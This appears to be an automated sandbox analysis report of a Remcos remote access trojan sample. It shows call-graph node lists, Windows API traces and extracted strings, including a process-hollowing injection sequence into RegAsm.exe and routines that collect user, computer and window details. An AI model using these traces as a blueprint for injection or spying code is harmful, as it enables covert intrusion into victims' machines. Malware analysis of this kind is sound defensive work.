API calls 53844->53848 53845 4020f6 28 API calls 53845->53848 53848->53839 53848->53842 53848->53843 53848->53844 53848->53845 53852 401fc0 53848->53852 53849->53719 53850->53827 53851->53830 53853 401fd2 CreateEventA CreateThread WaitForSingleObject CloseHandle 53852->53853 53854 401fc9 53852->53854 53853->53848 53857 415b25 53853->53857 53856 4025e0 28 API calls 53854->53856 53856->53853 53858 4020f6 28 API calls 53857->53858 53859 415b47 SetEvent 53858->53859 53860 415b5c 53859->53860 53936 4041a2 53860->53936 53863 4020f6 28 API calls 53864 415b86 53863->53864 53865 4020f6 28 API calls 53864->53865 53866 415b98 53865->53866 53939 41beac 53866->53939 53869 415bc1 GetTickCount 53961 41bc1f 
53869->53961 53870 415d20 53933 415d11 53870->53933 53934 415d34 53870->53934 53871 401e8d 11 API calls 53873 4170cd 53871->53873 53876 401fd8 11 API calls 53873->53876 53878 4170d9 53876->53878 53880 401fd8 11 API calls 53878->53880 53879 415bde 53882 41bc1f 28 API calls 53879->53882 53881 4170e5 53880->53881 53883 415be9 53882->53883 53967 41bb27 53883->53967 53888 401e65 22 API calls 53889 415c13 53888->53889 53890 402f31 28 API calls 53889->53890 53891 415c21 53890->53891 53976 402ea1 28 API calls 53891->53976 53893 415c30 53894 402f10 28 API calls 53893->53894 53895 415c3f 53894->53895 53977 402ea1 28 API calls 53895->53977 53897 415c4e 53898 402f10 28 API calls 53897->53898 53899 415c5a 53898->53899 53978 402ea1 28 API calls 53899->53978 53901 415c64 53902 404aa1 61 API calls 53901->53902 53903 415c73 53902->53903 53904 401fd8 11 API calls 53903->53904 53905 415c7c 53904->53905 53906 401fd8 11 API calls 53905->53906 53907 415c88 53906->53907 53908 401fd8 11 API calls 53907->53908 53909 415c94 53908->53909 53910 401fd8 11 API calls 53909->53910 53911 415ca0 53910->53911 53912 401fd8 11 API calls 53911->53912 53913 415cac 53912->53913 53914 401fd8 11 API calls 53913->53914 53915 415cb8 53914->53915 53979 401f09 53915->53979 53918 401fd8 11 API calls 53919 415cca 53918->53919 53920 401fd8 11 API calls 53919->53920 53921 415cd3 53920->53921 53922 401e65 22 API calls 53921->53922 53923 415cde 53922->53923 53982 43bb2c 53923->53982 53926 415cf0 53929 415d09 53926->53929 53930 415cfe 53926->53930 53927 415d16 53928 401e65 22 API calls 53927->53928 53928->53870 53987 404f51 53929->53987 53986 404ff4 82 API calls 53930->53986 53933->53871 54002 4050e4 84 API calls 53934->54002 53935 415d04 53935->53933 54003 40423a 53936->54003 53940 4020df 11 API calls 53939->53940 53960 41bebf 53940->53960 53941 41bf2f 53942 401fd8 11 API calls 53941->53942 53943 41bf61 53942->53943 53945 401fd8 11 API calls 53943->53945 53944 41bf31 53946 4041a2 28 API calls 53944->53946 53948 
41bf69 53945->53948 53949 41bf3d 53946->53949 53947 4041a2 28 API calls 53947->53960 53950 401fd8 11 API calls 53948->53950 53951 401fe2 28 API calls 53949->53951 53953 415ba1 53950->53953 53954 41bf46 53951->53954 53952 401fe2 28 API calls 53952->53960 53953->53869 53953->53870 53953->53933 53955 401fd8 11 API calls 53954->53955 53957 41bf4e 53955->53957 53956 401fd8 11 API calls 53956->53960 53958 41cec5 28 API calls 53957->53958 53958->53941 53960->53941 53960->53944 53960->53947 53960->53952 53960->53956 54009 41cec5 53960->54009 54045 441ed1 53961->54045 53964 402093 28 API calls 53965 415bd2 53964->53965 53966 41bb77 GetLastInputInfo GetTickCount 53965->53966 53966->53879 54054 436f10 53967->54054 53972 41bdaf 53973 41bdbc 53972->53973 53974 4020b7 28 API calls 53973->53974 53975 415c05 53974->53975 53975->53888 53976->53893 53977->53897 53978->53901 53980 402252 11 API calls 53979->53980 53981 401f12 53980->53981 53981->53918 53983 43bb45 _strftime 53982->53983 54108 43ae83 53983->54108 53985 415ceb 53985->53926 53985->53927 53986->53935 53988 404f65 53987->53988 53989 404fea 53987->53989 53990 404f6e 53988->53990 53991 404fc0 CreateEventA CreateThread 53988->53991 53992 404f7d GetLocalTime 53988->53992 53989->53933 53990->53991 53991->53989 54179 405150 53991->54179 53993 41bc1f 28 API calls 53992->53993 53994 404f91 53993->53994 54178 4052fd 28 API calls 53994->54178 54002->53935 54004 404243 54003->54004 54005 4023ce 11 API calls 54004->54005 54006 40424e 54005->54006 54007 402569 28 API calls 54006->54007 54008 4041b5 54007->54008 54008->53863 54010 41ced2 54009->54010 54011 41cf31 54010->54011 54015 41cee2 54010->54015 54012 41cf4b 54011->54012 54013 41d071 28 API calls 54011->54013 54029 41d1d7 28 API calls 54012->54029 54013->54012 54016 41cf1a 54015->54016 54020 41d071 54015->54020 54028 41d1d7 28 API calls 54016->54028 54019 41cf2d 54019->53960 54022 41d079 54020->54022 54021 41d0ab 54021->54016 54022->54021 54023 41d0af 54022->54023 54026 41d093 
54022->54026 54040 402725 22 API calls 54023->54040 54030 41d0e2 54026->54030 54028->54019 54029->54019 54031 41d0ec __EH_prolog 54030->54031 54041 402717 22 API calls 54031->54041 54033 41d0ff 54042 41d1ee 11 API calls 54033->54042 54035 41d125 54036 41d15d 54035->54036 54043 402730 11 API calls 54035->54043 54036->54021 54038 41d144 54044 402712 11 API calls std::_Deallocate 54038->54044 54041->54033 54042->54035 54043->54038 54044->54036 54046 441edd 54045->54046 54049 441ccd 54046->54049 54048 41bc43 54048->53964 54050 441ce4 54049->54050 54052 441d1b pre_c_initialization 54050->54052 54053 44062d 20 API calls _Atexit 54050->54053 54052->54048 54053->54052 54055 41bb46 GetForegroundWindow GetWindowTextW 54054->54055 54056 40417e 54055->54056 54057 404186 54056->54057 54062 402252 54057->54062 54059 404191 54066 4041bc 54059->54066 54063 40225c 54062->54063 54064 4022ac 54062->54064 54063->54064 54070 402779 11 API calls std::_Deallocate 54063->54070 54064->54059 54067 4041c8 54066->54067 54071 4041d9 54067->54071 54069 40419c 54069->53972 54070->54064 54072 4041e9 54071->54072 54073 404206 54072->54073 54074 4041ef 54072->54074 54088 4027e6 54073->54088 54078 404267 54074->54078 54077 404204 54077->54069 54079 402888 22 API calls 54078->54079 54080 40427b 54079->54080 54081 404290 54080->54081 54082 4042a5 54080->54082 54099 4042df 22 API calls 54081->54099 54083 4027e6 28 API calls 54082->54083 54087 4042a3 54083->54087 54085 404299 54100 402c48 22 API calls 54085->54100 54087->54077 54089 4027ef 54088->54089 54090 402851 54089->54090 54091 4027f9 54089->54091 54107 4028a4 22 API calls 54090->54107 54094 402802 54091->54094 54095 402815 54091->54095 54101 402aea 54094->54101 54097 402813 54095->54097 54098 402252 11 API calls 54095->54098 54097->54077 54098->54097 54099->54085 54100->54087 54102 402af4 __EH_prolog 54101->54102 54103 402e45 22 API calls 54102->54103 54104 402b60 54103->54104 54105 402252 11 API calls 54104->54105 54106 402bce 54105->54106 
[Execution graph: the report renders this as an image; only its node/edge list survived extraction and is omitted here. Named nodes in the graph: CRT startup and locale helpers (pre_c_initialization, _Atexit, __Getctype, __cftof, _strftime, ___scrt_fastfail, dllmain_raw, CallCatchBlock, try_get_function) and the Windows APIs LoadLibraryA/GetProcAddress, GetModuleHandleA, GetModuleFileNameW, LoadLibraryExW/FreeLibrary, RegOpenKeyExA/RegQueryValueExA/RegCloseKey, FindResourceA/LoadResource/LockResource/SizeofResource, GetEnvironmentVariableW, FindFirstFileW/FindNextFileW/FindClose, lstrlenW/lstrcatW, DeleteFileW, Sleep, GetNativeSystemInfo, VirtualAlloc/VirtualProtect/VirtualFree, GetProcessHeap/HeapAlloc/HeapFree/RtlAllocateHeap/RtlReAllocateHeap, IsBadReadPtr, TlsAlloc, GetStartupInfoW, IsProcessorFeaturePresent/IsDebuggerPresent/SetUnhandledExceptionFilter/UnhandledExceptionFilter, GetSystemTimeAsFileTime/GetCurrentThreadId/GetCurrentProcessId/QueryPerformanceCounter, MultiByteToWideChar/WideCharToMultiByte/LCMapStringW/GetStringTypeW/GetCPInfo/IsValidCodePage/GetACP/GetOEMCP, InitializeCriticalSectionAndSpinCount/EnterCriticalSection/LeaveCriticalSection/DeleteCriticalSection/RtlDeleteCriticalSection/RtlInitializeSListHead, GetLastError/SetLastError, and send.]

                                                Control-flow Graph

                                                APIs
                                                • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                                                • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                                • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                                • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$LibraryLoad$HandleModule
                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                • API String ID: 4236061018-3687161714
                                                APIs
                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                • ReadProcessMemory.KERNEL32 ref: 004182A6
                                                • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00418328
                                                • NtClose.NTDLL(?), ref: 00418332
                                                • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                                                • WriteProcessMemory.KERNEL32 ref: 00418446
                                                • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                • ResumeThread.KERNEL32(?), ref: 00418470
                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                                                • NtClose.NTDLL(?), ref: 004184A3
                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                • GetLastError.KERNEL32 ref: 004184B5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                • API String ID: 316982871-3035715614
                                                APIs
                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                • FindClose.KERNEL32(00000000), ref: 100011DB
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                • String ID:
                                                • API String ID: 1083526818-0
                                                APIs
                                                  • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                                                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                  • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                  • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                  • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                • String ID:
                                                • API String ID: 3950776272-0
                                                APIs
                                                  • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                  • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                                                  • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                • ExitProcess.KERNEL32 ref: 0040F905
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                • String ID: 5.1.1 Pro$override$pth_unenc
                                                • API String ID: 2281282204-2344886030
                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,00829328), ref: 004338DA
                                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                • String ID:
                                                • API String ID: 1815803762-0
                                                APIs
                                                • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                Strings
                                                • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Time$FileSystem
                                                • String ID: GetSystemTimePreciseAsFileTime
                                                • API String ID: 2086374402-595813830
                                                APIs
                                                • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                                • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Name$ComputerUser
                                                • String ID:
                                                • API String ID: 4229901323-0
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                APIs
                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                  • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                • String ID: 8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Rmc-GT4655$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
